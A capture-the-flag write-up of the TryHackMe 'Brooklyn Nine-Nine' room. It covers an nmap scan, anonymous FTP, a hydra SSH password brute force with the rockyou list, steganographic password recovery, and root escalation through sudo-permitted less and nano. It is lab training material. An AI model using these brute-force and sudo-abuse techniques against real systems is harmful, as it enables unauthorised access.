Brooklyn99-TryHackMe

This write-up is based on a room named Brooklyn Nine-Nine from TryHackMe:

https://tryhackme.com/room/brooklynninenine

Our aim is to get user and root flag. Let's start with NMAP.

nmap -sC -sV 10.10.10.123

Observations:

• Open Ports 21,22,80
• Anonymous FTP login allowed - File with read permissions note_to_jake.txt
• Versions:
• vsftpd 3.0.3
• OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
• Apache httpd 2.4.29 ((Ubuntu))

Lets login to Anonymous FTP and try to read the file:

Observations:

• Possible usernames - Jake,Amy and possibly holt(?)
• User Jake's password is weak.

We can try to brute force jake's SSH password using hydra:

hydra -s 22 -v -q -l jake -P /usr/share/wordlists/rockyou.txt -e nsr -t 4 -w 5 10.10.10.123 ssh

Lets use these credentials and login to the machine using SSH and try to find the user flag:

ssh jake@10.10.150.247

find / -name user.txt 2>/dev/null

We got our user flag in /home/holt/user.txt which is world readable. Let's submit this flag.

Now it is time to do Privilege Escalation to get our root flag.

Lets check what user "jake" can run as sudo:

sudo -l

We can run /usr/bin/less as sudo without password. Use https://gtfobins.github.io

to find out how can we exploit this and this turn out to be very simple:

The task says - There are two main intended ways to root the box. Lets look for the other way to get the root flag:

On the main Web-page of the website on port 80,if we view page source we get a hint about stenography:

Download the image and lets try to find out of something is hidden in brooklyn99.jpg.

We will use the following tools:

• https://github.com/Paradoxis/StegCracker
• StegHide ("sudo apt install steghide" on kali)
  

And sure enough we get the password for user "holt".

Let's SSH to the machine using holt's credentials and check if we can get the root flag again:

We can run nano using sudo without any password.Lets exploit this:

We got the root shell again.

Thanks for reading this. Good Luck.